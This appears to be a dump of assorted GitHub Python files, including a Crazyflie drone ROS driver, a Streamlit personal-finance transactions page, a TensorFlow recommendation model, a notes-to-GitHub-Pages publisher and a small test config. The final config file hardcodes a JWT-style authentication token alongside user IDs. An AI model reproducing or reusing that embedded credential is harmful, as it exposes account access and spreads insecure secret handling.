vase.faces('+Z').shell(-thickness)\n \n return (outerShell\n .intersect(voronoiConvexs(diameter, height, thickness, step))\n .union(innerShell)\n )\n \nvase = voronoi_vase(diameter, sides, height, thickness, step)\n","repo_name":"JustinSDK/cqMore","sub_path":"examples/voronoi_vase.py","file_name":"voronoi_vase.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"52"} +{"seq_id":"5932887841","text":"###!/usr/bin/env python3\n### Author: Qian Zhao\n\nimport rospy\nimport cflib\nfrom geometry_msgs.msg import Twist\nfrom geometry_msgs.msg import Pose\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Quaternion\n\nimport logging\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nimport cflib.crtp\nfrom cflib.crazyflie import Crazyflie\nfrom cflib.crazyflie.syncCrazyflie import SyncCrazyflie\nfrom cflib.crazyflie.syncLogger import SyncLogger\nfrom cflib.crazyflie.log import LogConfig\nfrom cflib.positioning.motion_commander import MotionCommander\n\nlogging.basicConfig(level=logging.ERROR)\nURI = 'radio://1/7/1M'\n\n\nclass Node:\n\n def __init__(self):\n \n self.vx = 0\n self.vy = 0\n self.vz = 0\n self.va = 0\n \n self.vel = Twist()\n self.pose = Pose()\n\n self.vel.linear.x = self.vx\n self.vel.linear.y = self.vy\n self.vel.linear.z = self.vz\n self.vel.angular.z = self.va\n\n cflib.crtp.init_drivers(enable_debug_driver=False)\n self.crazyflie = SyncCrazyflie(URI, cf = Crazyflie(rw_cache='./cache'))\n self.commander = MotionCommander(self.crazyflie)\n self.cf = Crazyflie()\n self.crazyflie.open_link()\n self.commander.take_off()\n\n def write_to_file(self, data):\n # Two loggers should yield an even number of rows of data\n # being collected in the end.\n # There is one packet missing if the array only contains\n # an even number of rows of data.\n if len(data) % 2 is not 0:\n data = data[:len(data) - 1]\n\n temp_df = pd.DataFrame(data)\n m, _ = temp_df.shape\n even_rows = temp_df.iloc[np.arange(0, m, 2), :]\n odd_rows = temp_df.iloc[np.arange(1, m, 2), :]\n\n columns = ['timestamp_start', 'timestamp_end',\n 'acc.x', 'acc.y', 'acc.z',\n 'gyro.x', 'gyro.y', 'gyro.z',\n 'stateEstimate.x', 'stateEstimate.y', 'stateEstimate.z',\n 'stabilizer.pitch', 'stabilizer.roll', 'stabilizer.yaw']\n\n df = pd.DataFrame(data=np.zeros((int(m / 2), 14)), columns=columns)\n df[['gyro.x', 'gyro.y', 'gyro.z']] = np.array(even_rows[['gyro.x', 'gyro.y', 'gyro.z']])\n df[['stabilizer.pitch', 'stabilizer.roll', 'stabilizer.yaw']] = np.array(\n even_rows[['stabilizer.pitch', 'stabilizer.roll', 'stabilizer.yaw']])\n df[[\"acc.x\", \"acc.y\", \"acc.z\"]] = np.array(odd_rows[[\"acc.x\", \"acc.y\", \"acc.z\"]])\n df[[\"stateEstimate.x\", \"stateEstimate.y\", \"stateEstimate.z\"]] = \\\n np.array(odd_rows[[\"stateEstimate.x\", \"stateEstimate.y\", \"stateEstimate.z\"]])\n df['timestamp_start'] = np.array(even_rows.timestamp)\n df['timestamp_end'] = np.array(odd_rows.timestamp)\n\n # df.to_csv(\"data/project2/drone2/data_set_label_\"\n # +class_label+\"_packet_\"+packet_num+\".csv\")\n df.to_csv(\"test.csv\")\n\n def write(self, data):\n print(data)\n\n def log1(self):\n\n lg1 = LogConfig(name='pose_acc', period_in_ms=10)\n\n lg1.add_variable('stateEstimate.x', 'float')\n lg1.add_variable('stateEstimate.y', 'float')\n lg1.add_variable('stateEstimate.z', 'float')\n\n lg1.add_variable('acc.x', 'float')\n lg1.add_variable('acc.y', 'float')\n lg1.add_variable('acc.z', 'float')\n\n return lg1\n\n def log2(self):\n\n lg2 = LogConfig(name='stabilizer_gyro', period_in_ms=10)\n \n lg2.add_variable('stabilizer.roll', 'float')\n lg2.add_variable('stabilizer.pitch', 'float')\n lg2.add_variable('stabilizer.yaw', 'float')\n\n lg2.add_variable('gyro.x', 'float')\n lg2.add_variable('gyro.y', 'float')\n lg2.add_variable('gyro.z', 'float')\n\n return lg2\n\n def sync(self, position_pub, data):\n\n switch = 0\n with SyncLogger(self.crazyflie, self.log1()) as logger1, \\\n SyncLogger(self.crazyflie, self.log2()) as logger2:\n end_time = time.time() + 24\n while time.time() < end_time:\n if switch == 0: \n logger = logger2\n elif switch == 1:\n logger = logger1\n\n for log_entry in logger:\n row = log_entry[1]\n row[\"timestamp\"] = log_entry[0]\n if switch == 1:\n x = row['stateEstimate.x']\n y = row['stateEstimate.y']\n z = row['stateEstimate.z']\n\n self.pose.position.x = x\n self.pose.position.y = y\n self.pose.position.z = z\n\n position_pub.publish(self.pose)\n print('x:',x,' y:',y,' z:',z)\n print()\n data.append(row)\n switch += 1\n break\n\n if switch == 2:\n switch = 0\n return None\n\n def shut_down(self):\n self.crazyflie.close_link()\n\n def cmd_vel(self, msg):\n \n self.vx = msg.linear.x\n self.vy = msg.linear.y\n self.vz = msg.linear.z\n self.va = msg.angular.z\n self.commander._set_vel_setpoint(self.vx,self.vy,self.vz,self.va)\n\n print(self.vx, self.vy, self.vz, self.va) \n\n\ndef run():\n data =[]\n rospy.init_node('drone1')\n node = Node()\n cmdVel_subscribe = rospy.Subscriber('drone1/cmd_vel', Twist, node.cmd_vel)\n position_pub = rospy.Publisher('drone1/pose', Pose, queue_size=10)\n timer = time.time() \n\n while time.time()-timer < 24:\n node.sync(position_pub, data)\n print(\"End\")\n\n node.write_to_file(data)\n node.shut_down()\n\n\nif __name__ == '__main__':\n run()\n\n","repo_name":"qianzhao27/Driver_of_crazyflie","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73841566244","text":"# learn by project\n# inventory\n\nimport time\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# set of possible things - \n# database with parameters - possible value intervals\n\n# name generator from another database\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# loading script \n# creates dictionary from database ?\n\n\n#armory = \n\n\n#d = {}\nd = {\n \"name\":\"Mighty Sword\", \n \"type\":\"long-sword\", \n \"damage\": {\n \"drop\": {\n \"min\":10, # minimal for drop rate\n \"max\":20 # maximal for drop rate\n },\n \"crit\":42 # always the same\n },\n \"weight\": 10,\n \"durability\": {\n \"drop\": {\n \"min\":50,\n \"max\":100\n },\n \"coeficient\":1\n },\n \"slots\": {\n \"x\":1,\n \"y\":4\n },\n \"material\":\"irridium\"\n# \"model\":\"long_sword_1 # model would be generated in loading time as a combination of individual database parameters with an extension\n }\n\n#d[\"key\"] = \"value\"\n#str = d[\"damage\"][\"crit\"]\n\nstr = d[\"damage\"][\"crit\"]*10\n\nprint(str)\n\ntime.sleep(2)\n\n# list [ \n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# inventory \n# list with that can import things by find_random ...\n# add item with random parameters with values within possible value intervals\n\n# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n# quest\n# find enaught items for killing enemy - enaugh damage\n","repo_name":"gr4viton/python-scripts","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16937360414","text":"\nimport os\nimport sys\nimport yaml\n\n# 野蛮的引入方式,至少 work\nsys.path.append(os.path.abspath('./'))\nfrom common.indexing import get_all_markdown_file\n# print(sys.path)\n\n\ndef removing_dir(to_delete_path):\n if not os.path.exists(to_delete_path):\n print('要删除的目录 ' + to_delete_path + ' 不存在')\n return\n if os.path.isdir(to_delete_path):\n for item in os.listdir(to_delete_path):\n removing_dir(to_delete_path + '/' + item)\n else:\n os.remove(to_delete_path)\n print('目录 ' + to_delete_path + ' 已经删除')\n\n\ndef markdown_moving(source_root_path, dist_root_path):\n parent_dirs = []\n for markdown_file in get_all_markdown_file(source_root_path):\n parent_dir = ''\n for subdir in markdown_file.split('/')[:-1]:\n parent_dir = parent_dir + subdir + '/'\n parent_dir = parent_dir.rstrip('/')\n parent_dirs.append(parent_dir)\n \n for parent_dir in parent_dirs:\n dist_parent_dir = parent_dir.replace(source_root_path, dist_root_path)\n print(dist_parent_dir)\n if not os.path.exists(dist_parent_dir):\n print(dist_parent_dir + ' not exists, and createing it...')\n os.makedirs(dist_parent_dir)\n \n for markdown_file in get_all_markdown_file(source_root_path):\n print('copy ' + markdown_file + ' ' + markdown_file.replace(source_root_path, dist_root_path))\n os.system('copy ' + markdown_file.replace('/','\\\\') + ' ' + markdown_file.replace(source_root_path, dist_root_path).replace('/','\\\\'))\n\n\nif __name__=='__main__':\n # 一些基本参数\n source_file_folder = 'C:/Users/Five/Desktop/note'\n github_folder = 'C:/Users/Five/Documents/Github'\n \n user_name = 'wodswos'\n repository_name = 'wodswos.github.io'\n repository_path = github_folder + '/' + repository_name\n\n # 一系列会用到的 git 命令,默认已配置 ssh\n git_clone_command = 'git clone git@github.com:' + user_name + '/' + repository_name\n git_add_command = 'git add --all'\n git_commit_command = \"git commit -m debugging\"\n git_push_command = 'git push git@github.com:' + user_name + '/' + repository_name\n\n # 仓库已经存在则切换到目录,否则先 clone 仓库\n if not os.path.exists(repository_path):\n os.chdir(github_folder)\n os.system(git_clone_command)\n os.chdir(repository_path)\n\n # 清空除 .git 以外的文件夹,从零重新生成\n rebuild_flag = True\n for item in os.listdir(repository_path):\n if item != '.git' and rebuild_flag == True:\n print(item)\n removing_dir(repository_path + '/' + item)\n\n\n # 主逻辑\n if not os.path.exists(repository_path):\n os.mkdir(repository_path)\n pages_path = repository_path + '/src/pages'\n markdown_moving(source_file_folder, repository_path)\n\n\n # 提交,收尾\n os.system(git_add_command)\n print('Added to index.')\n os.system(git_commit_command)\n print('Committed to local repository.')\n os.system(git_push_command)\n print('Pushed to Github.')\n","repo_name":"Wodswos/bisheng","sub_path":"publish/GithubPagesLocalBuild.py","file_name":"GithubPagesLocalBuild.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41550994737","text":"from picamera import PiCamera\nfrom time import sleep\nfrom vutil import *\n\nwith PiCamera() as camera:\n camera.vflip = True\n camera.resolution = get_resolution()\n\n camera.start_preview()\n for i in range(5):\n sleep(5)\n camera.capture(f'./image_{i}.jpg')\n \n camera.stop_preview()","repo_name":"hongjy127/TIL","sub_path":"07. raspberrypi/python/picam-ex/imagecapture/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41620851527","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport sys\nimport numpy as np\nimport tensorflow as tf\n\nimport dnn_feature_views as fv\n# Step 4: Build and train a recall model.\n\nuv_size = 128 # Dimension of the user/item vector.\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n # hidden layer\n W1 = tf.Variable(tf.truncated_normal([fv.embedding_size, uv_size]))\n b1 = tf.Variable(tf.truncated_normal([uv_size]))\n #W2 = tf.Variable(tf.truncated_normal([256, uv_size]))\n #b = tf.Variable(tf.truncated_normal([uv_size]))\n\n # Input data.\n train_dataset = tf.sparse_placeholder(tf.int32, shape=[fv.batch_size, fv.vocabulary_size])\n train_labels = tf.placeholder(tf.int32, shape=[fv.batch_size, 1])\n\n # Ops and variables pinned to the CPU because of missing GPU implementation\n with tf.device('/cpu:0'):\n # Look up embeddings for inputs.\n embeddings = tf.Variable(\n tf.random_uniform([fv.vocabulary_size, fv.embedding_size], -1.0, 1.0))\n\n # Construct the variables for the NCE loss\n nce_weights = tf.Variable(\n tf.truncated_normal([fv.vocabulary_size, uv_size],\n stddev=1.0 / math.sqrt(uv_size)))\n nce_biases = tf.Variable(tf.zeros([fv.vocabulary_size]))\n\n embed = tf.nn.embedding_lookup_sparse(embeddings,train_dataset, sp_weights=None, combiner=\"mean\")\n\n layer1 = tf.nn.relu(tf.matmul(embed, W1) + b1)\n #layer2 = tf.nn.relu(tf.matmul(layer1, W2))#) + b)\n #Compute the average NCE loss for the batch.\n #tf.nce_loss automatically draws a new sample of the negative labels each\n #time we evaluate the loss.\n loss = tf.reduce_mean(\n tf.nn.nce_loss(weights=nce_weights,\n biases=nce_biases,\n labels=train_labels,\n inputs=layer1,\n num_sampled=fv.num_sampled,\n partition_strategy=\"div\",\n num_classes=fv.vocabulary_size))\n\n # Construct the SGD optimizer using a learning rate of 1.0.\n optimizer = tf.train.AdamOptimizer(0.01).minimize(loss)\n\n # Add variable initializer.\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n# Step 5: Begin training.\n\nwith tf.Session(graph=graph) as session:\n # We must initialize all variables before we use them.\n init.run()\n print(\"Initialized\")\n checkpoint_dir = \"./ckpt/\"\n infer_ckpt = tf.train.get_checkpoint_state(checkpoint_dir)\n if infer_ckpt and infer_ckpt.model_checkpoint_path:\n print(\"Use the model {}\".format(infer_ckpt.model_checkpoint_path))\n saver.restore(session, infer_ckpt.model_checkpoint_path)\n for step in range(fv.num_steps):\n step += 1\n batch_inputs, batch_labels = fv.generate_batch(fv.batch_size)\n feed_dict = {train_dataset: batch_inputs, train_labels: batch_labels}\n\n # We perform one update step by evaluating the optimizer op (including it\n # in the list of returned values for session.run()\n _, loss_val = session.run([optimizer, loss], feed_dict=feed_dict)\n\n if step % 100 == 0:\n print(\"Average loss at step \", step, \": \", loss_val)\n average_loss = 0\n if step % 100000 == 0:\n save_path = saver.save(session, checkpoint_dir+'model.ckpt',global_step=step)\n print(\"Model saved in file: %s\" % save_path)\n\n np.savetxt(fv.itemvec, nce_weights.eval())\n","repo_name":"Jayyyyyyyyyyyy/recall-rank","sub_path":"src/main/python/dnn_recall_model.py","file_name":"dnn_recall_model.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6355914545","text":"# Dictionary file location, change if needed.\ndictionary_loc = 'DATA TXT Files\\dictionary.txt'\n\n# Turn text file location, change if needed.\nturn_text_loc = 'data/turntext.txt'\n\n# Wheel contents for file location, change if needed.\nwheel_text_loc = 'DATA TXT FILES\\wheeldata.txt'\n\n# End of Round Status status file, change if needed.\nround_status_loc = 'data/roundstatus.txt'\n\n# number of rounds in a game\nmax_rounds = 3\n\n# Vowel cost\nvowel_cost = 250\n\n# final prize, you fill this in\nfinal_prize = 50000\n\n# final round, change if needed.\nfinal_round_text_loc = 'data/finalround.txt'\n","repo_name":"nolanthomas32/M06-Assessment","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37153934364","text":"#!/usr/bin/env python3\nimport rospy\n\nfrom std_msgs.msg import Int32, Bool\n\nfrom common.pwm_driver import PWMDriver\n\nclass ESCController:\n \"\"\"\n Controller for the ESC.\n \"\"\"\n def __init__(self):\n self.__id = rospy.get_param(\"VEHICLE_ID\")\n self.__message_queue_size = rospy.get_param(\"MESSAGE_QUEUE_SIZE\")\n\n self.__idle = rospy.get_param(\"IDLE_MOTOR\")\n self.__min_forward = rospy.get_param(\"MIN_FORWARD_MOTOR\")\n self.__max_forward = rospy.get_param(\"MAX_FORWARD_MOTOR\")\n self.__max_reverse = rospy.get_param(\"MAX_REVERSE_MOTOR\")\n self.__calibrated = False\n\n self.__driver = PWMDriver(\n rospy.get_param(\"MOTOR_PIN\"),\n rospy.get_param(\"PWM_FREQUENCY_MOTOR\"))\n\n self.__calibrated_publisher = rospy.Publisher(\n f\"{self.__id}/esc_calibrated\",\n Bool,\n queue_size=self.__message_queue_size)\n\n rospy.Subscriber(f\"{self.__id}/pwm\", Int32, self.__callback_pwm)\n rospy.Timer(\n rospy.Duration(1),\n self.__callback_start_calibration,\n oneshot=True)\n\n # Continuously broadcast calibrated to ensure that every node\n # receives it.\n rospy.Timer(\n rospy.Duration(3),\n self.__callback_broadcast_calibration)\n\n def __callback_start_calibration(self, event):\n self.__driver.set_pwm(self.__idle)\n\n def __callback_broadcast_calibration(self, event):\n self.__calibrated = True\n self.__calibrated_publisher.publish(True)\n\n def __callback_pwm(self, msg: Int32):\n \"\"\"\n Callback function for the pwm.\n \"\"\"\n if not self.__calibrated:\n return\n\n new_pwm = max(self.__max_reverse, min(msg.data, self.__max_forward))\n self.__driver.set_pwm(new_pwm)\n\n def stop(self):\n \"\"\"\n Stop the ESC.\n \"\"\"\n self.__driver.set_pwm(self.__idle)\n self.__driver.cleanup()\n\nif __name__ == \"__main__\":\n rospy.init_node(\"esc_node\", anonymous=True)\n controller = ESCController()\n rospy.on_shutdown(controller.stop)\n\n rospy.loginfo(\"ESC controller node started.\")\n rospy.spin()\n","repo_name":"McFrappe/LAFF-Platooning","sub_path":"src/rcv/nodes/esc.py","file_name":"esc.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17959256273","text":"import requests\nimport sys\nimport os \nfrom pathlib import Path\nfrom datetime import datetime\nimport logging\n\nimport streamlit as st\nfrom streamlit_modal import Modal\nimport streamlit.components.v1 as components\n\nbase_container_path = str(Path(os.path.abspath(__file__)).parents[1]).replace('\\\\', '/')\nif base_container_path not in sys.path:\n sys.path.append(base_container_path)\nif \"/finapp/\" not in sys.path:\n sys.path.append('/finapp')\n\n\nfrom lib.mongo import mongo\nfrom categories.directory import load_categories\nimport transactions\nimport gui_utils\n# +-----------------+\n# | Initialize Page |\n# +-----------------+-----------------------------------------------\n# Setup logger\nlogger = logging.getLogger(__name__)\nif sum([isinstance(handler, logging.FileHandler) for handler in logger.handlers]):\n logger.setLevel(logging.DEBUG)\n handler=logging.FileHandler(\"/finapp/logs/gui.log\")\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(filename)s - %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\nbanks = mongo.get_access_tokens()\n\ncategories = [cat.name for cat in load_categories()]\ncategories.append('N/A')\n\nif \"edit_view\" not in st.session_state or \"edit_transaction\" not in st.session_state:\n st.session_state.edit_view = False\n st.session_state.edit_transaction = None\n\nSESSION_STATE = st.session_state\n# +---------------+\n# | Load Sidebar |\n# +---------------+-----------------------------------------------\nwith st.sidebar:\n # Show Configuration Options\n month_offset = gui_utils.choose_month_widget()\n category = st.selectbox('Category', categories, index=(len(categories)-1))\n categorize = st.button(\"Re-Categorize\")\n if categorize:\n st.write(transactions.sort(month_offset=month_offset))\n update = st.button(\"Update Transactions\")\n\n # +--------------------------------------+\n # | Update Transactions (inside sidebar) |\n # +--------------------------------------+---------------------------------\n if update:\n logger.info(\"Updating Transactions\")\n progress_text = \"Updating Transaction Information\"\n progress = 0\n progress_bar = st.progress(progress, text=progress_text)\n\n progress_bar.progress(progress + 5, text=f\"{progress_text}\\n\\nLoading First Institution\")\n for bank in [b for b in banks if b['working']]:\n try:\n progress_bar.progress(progress + 5, text=f\"{progress_text}\\n\\nLoading {bank['bank_name']}\")\n resp = requests.get('http://plaid:5000/api/get_transactions', params={\"access_token\":bank['access_token']})\n\n # Update progress bar\n progress += int((1/len(banks))*100)\n if progress >= 100: progress = 100\n progress_bar.progress(progress, text=f\"{progress_text}\\n\\nCompleted {bank['bank_name']}\")\n except Exception as e:\n st.error(f\"Failed bank: {bank['bank_name']}\")\n st.error(e)\n st.write(e)\n progress_bar.progress(progress, text=f\"Finished Updating Transaction Information\\n\\n{resp.text}\") \n\n# +-----------------------+\n# | Edit Transaction View |\n# +-----------------------+---------------------------------\ndef _open_edit_view(transaction):\n # persist edit view\n st.session_state.edit_view = True\n st.session_state.edit_transaction = transaction\n\n # Print Information\n st.write('---')\n st.title(\"Edit Transaction\")\n # print headers\n col_headers = ['Amount', 'Account', 'Name', \"Date Authorized\", \"Category\"]\n modal_cols = st.columns((1, 1, 2, 2, 1))\n for col, header in zip(modal_cols, col_headers):\n col.write(header)\n \n # parse transaction data\n amount = f\"{float(transaction['amount']):.2f}\"\n account = transaction['account']\n name = transaction['name']\n date = transaction['date_authorized']\n category = transaction['category']\n \n # print transaction data\n for col, val in zip(modal_cols, (amount, account, name, date, category)):\n col.write(val)\n \n # Show Edit Options\n cat_dropdown, _, apply_but, cancel_but = st.columns((1,2,1,1))\n manual_cat = cat_dropdown.selectbox( 'Change Category to:', categories, args = (transaction,))\n apply_but.button(\"Apply\", on_click=_apply_edit, args=(transaction, manual_cat))\n cancel_but.button(\"Cancel\", on_click=_cancel_edit)\n st.write('---')\n\n\ndef _cancel_edit():\n st.session_state.edit_view = False \n st.session_state.edit_transaction = None\n\ndef _apply_edit(transaction, category):\n transaction['category'] = category\n logger.info(f\"Categorizing transaction ({transaction['_id']}:{transaction['name']}:{transaction['name']}): {category}\")\n mongo.set_transaction(transaction)\n _cancel_edit()\n\n# +---------------------------------------+\n# | Show Transactions (category specific) |\n# +---------------------------------------+---------------------------------\n# Setup \nmodal = Modal(key=\"Transaction Modal\", title=\"Transaction\")\ntotal = 0 \n\n# Pring Headers\ntitle = st.empty()\n\ncols_size_1 = (1, 3, 2, 2) # numbers represent width\ncol_headers = ['Amount', 'Name', \"Date\", \"Action\"]\nfor col, header in zip(st.columns(cols_size_1), col_headers):\n col.write(header)\n\n# List each transaction\ntrans = mongo.get_transactions(category, month_offset=month_offset)\nfor i, t in enumerate(trans):\n cols = st.columns(cols_size_1)\n amount = f\"{float(t['amount']):.2f}\"\n name = t['name']\n date = t['date_authorized']\n for col, val in zip(cols, (amount, name, date)):\n col.write(val)\n total += float(amount)\n with cols[3]:\n view, edit = st.columns(2, gap=\"small\")\n view_phold = view.empty()\n edit_phold = edit.empty()\n view = view_phold.button(\"View\", key=f\"view_{i}\")\n edit = edit_phold.button(\"Edit\", key=f\"edit_{i}\")\n\n # Keep Editin if already editing\n if st.session_state.edit_view:\n if (name == st.session_state.edit_transaction['name'] and \n t['amount'] == st.session_state.edit_transaction['amount']):\n _open_edit_view(st.session_state.edit_transaction)\n \n # Detailed View popup (modal popup)\n if view:\n with modal.container():\n cols_size_2 = (1, 1, 2, 2, 1) # numbers represent width\n col_headers = ['ID', 'Amount', 'Account', 'Name', \"Date Authorized\", \"Category\"]\n modal_cols = st.columns(cols_size_2)\n # print headers\n for col, header in zip(modal_cols, col_headers):\n col.write(header)\n # print detailed transaciton\n for col, val in zip(modal_cols, (t['_id'],amount, t['account'], name, date, t['category'])):\n col.write(val)\n # Open Edit view\n if edit:\n _open_edit_view(t)\n\nwith title.container():\n cat = 'Uncategorized' if category == 'N/A' else category\n st.title(f\"{cat}: ${total:,}\")\n\n # manual_category = st.selectbox(\n # 'Manual Category',\n # categories, on_change=_keep_state)\n # apply = st.button(\"Apply Category\")\n # if apply:\n # t['category'] = manual_category\n # logger.info(f\"Categorizing transaction ({t['_id']}): {manual_category}\")\n # mongo.set_transaction(t)\n \n # modal.open()\n # button_phold.empty() # remove button\n ","repo_name":"masinusa/my-finance","sub_path":"src/gui/pages/3_Transactions.py","file_name":"3_Transactions.py","file_ext":"py","file_size_in_byte":7510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26404737411","text":"import operator\n\nfrom django.http import HttpResponse\nfrom django.views import View\nfrom django.shortcuts import render\n\nclass MyView(View):\n\n def get(self, request, *args, **kwargs):\n # context ={ 'name':'Wathslaya', 'age' : 25, 'country' :'Srilanka'\n return render(request,'index.html' )\n\ndef count(request):\n\tfulltext = request.GET['fulltext']\n\twordlist = fulltext.split()\n\tword_dictionary = {}\n\tfor word in wordlist:\n\t\tif word in word_dictionary:\n\t\t\t#increase the frequency\n\t\t\tword_dictionary[word] += 1\n\t\telse:\n\t\t\t# add the word to the dictionary\n\t\t\tword_dictionary[word] = 1\n\t# word_dictionary.items convert the dict into list\n\tsorted_words = sorted(word_dictionary.items(),key=operator.itemgetter(1), reverse = True)\n\tprint(sorted_words)\n\n\treturn render(request, 'count.html', {'fulltext':fulltext,'count':len(wordlist),'word_dictionary':word_dictionary,'sorted':sorted_words})\n\n\n","repo_name":"Wathsalya/Counter_word_Django","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9291258685","text":"class Product:\n def __init__(self, json_data):\n self.itemName = json_data.get(\"item_title\", \"\")\n self.sku = json_data.get(\"sku\", \"\")\n self.itemPrice = (json_data.get(\"price_range\", {}) or {}).get(\"minimum_price\", {}).get(\"final_price\", {}).get(\"value\", \"\")\n self.salesSize = json_data.get(\"sales_size\", \"\")\n\n nutrition_data = (json_data.get(\"nutrition\") or [{}])[0]\n self.servingSize = nutrition_data.get(\"serving_size\", \"\")\n self.calPerServing = nutrition_data.get(\"calories_per_serving\", \"\")\n self.servingsPerContainer = nutrition_data.get(\"servings_per_container\", \"\")\n self.includes = \"\" # Initialize with empty string\n\n nutrition_details = (nutrition_data.get(\"details\") or [{}])\n nutrition_dict = {item.get('nutritional_item', ''): item for item in nutrition_details}\n self.totalFat = nutrition_dict.get('Total Fat', {}).get('amount', '')\n self.saturatedFat = nutrition_dict.get('Saturated Fat', {}).get('amount', '')\n self.transFat = nutrition_dict.get('Trans Fat', {}).get('amount', '')\n self.cholesterol = nutrition_dict.get('Cholesterol', {}).get('amount', '')\n self.sodium = nutrition_dict.get('Sodium', {}).get('amount', '')\n self.totalCarb = nutrition_dict.get('Total Carbohydrate', {}).get('amount', '')\n self.dietFiber = nutrition_dict.get('Dietary Fiber', {}).get('amount', '')\n self.totalSugars = nutrition_dict.get('Total Sugars', {}).get('amount', '')\n self.protein = nutrition_dict.get('Protein', {}).get('amount', '')\n self.vitaminD = nutrition_dict.get('Vitamin D', {}).get('amount', '')\n self.calcium = nutrition_dict.get('Calcium', {}).get('amount', '')\n self.iron = nutrition_dict.get('Iron', {}).get('amount', '')\n self.potassium = nutrition_dict.get('Potassium', {}).get('amount', '')\n \n # Handling the \"Includes\"/\"Added Sugars\" attribute\n self.includes = nutrition_dict.get('Includes', {}).get('amount', '')\n if self.includes == '': # If \"Includes\" is not found, try \"Added Sugars\"\n self.includes = nutrition_dict.get('Added Sugars', {}).get('amount', '')\n\n self.ingredients = [(ing.get(\"ingredient\", \"\") or \"\") for ing in (json_data.get(\"ingredients\") or [])]\n self.allergens = [(allergen.get(\"ingredient\", \"\") or \"\") for allergen in (json_data.get(\"allergens\") or [])]\n\n def to_dict(self):\n return {\n \"itemName\": self.itemName,\n \"sku\": self.sku,\n \"itemPrice\": self.itemPrice,\n \"salesSize\": self.salesSize,\n \"servingSize\": self.servingSize,\n \"calPerServing\": self.calPerServing,\n \"servingsPerContainer\": self.servingsPerContainer,\n \"includes\": self.includes,\n \"totalFat\": self.totalFat,\n \"saturatedFat\": self.saturatedFat,\n \"transFat\": self.transFat,\n \"cholesterol\": self.cholesterol,\n \"sodium\": self.sodium,\n \"totalCarb\": self.totalCarb,\n \"dietFiber\": self.dietFiber,\n \"totalSugars\": self.totalSugars,\n \"protein\": self.protein,\n \"vitaminD\": self.vitaminD,\n \"calcium\": self.calcium,\n \"iron\": self.iron,\n \"potassium\": self.potassium,\n \"ingredients\": self.ingredients,\n \"allergens\": self.allergens\n }","repo_name":"rithiksachdeva/Hobby-Projects","sub_path":"MealPlanning/APIRequests/productClass.py","file_name":"productClass.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22322213176","text":"# Users login data\ntoken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Mjg5NzcyMTEsImlhdCI6MTU2MDg1ODI5N30.xg2gFHZHte6f8oOIgED2Aw9jstwAEl3P0k4ABy2ry74\"\nadmin_id = \"28977211\"\nuser_id = \"28977211\"\n\n# Data to insert to DB\nproject_data = {\n \"project\": {\n \"name\": \"Performance Testing\",\n \"short_description\": \"Prepare performance tests for web application.\",\n \"long_description\": \"Vulputate odio ut enim blandit volutpat maecenas\",\n \"number_of_members\": 1,\n \"technology\": \"Python, Locust\",\n \"tags\": \"WebDev, WebTest\",\n \"requirements\": \"none\",\n \"theme_color\": \"#3f51b5\",\n \"verified\": 1},\n \"token\": token\n}\n\nteam_data = {\n \"team\": {\n \"open\": 1,\n \"max_number_of_members\": 1,\n \"token\": token\n }\n}\n\nnews_data = {\n \"news\": {\n \"title\": \"Need one person to my groupe!\",\n \"body\": \"Hi, I've just created new team, please be welcome to join me!\",\n \"user_id\": user_id},\n \"token\": token\n}\n\nupdate_data = {\n \"name\": \"Dominik\",\n \"surname\": \"Slawkowski\",\n \"team_id\": None\n}\n\n\n# print codes and text function\ndef status(response):\n print(\"Resposne code:\", response.status_code)\n print(\"Response plain text: \", response.text)\n\n","repo_name":"235002/RE","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 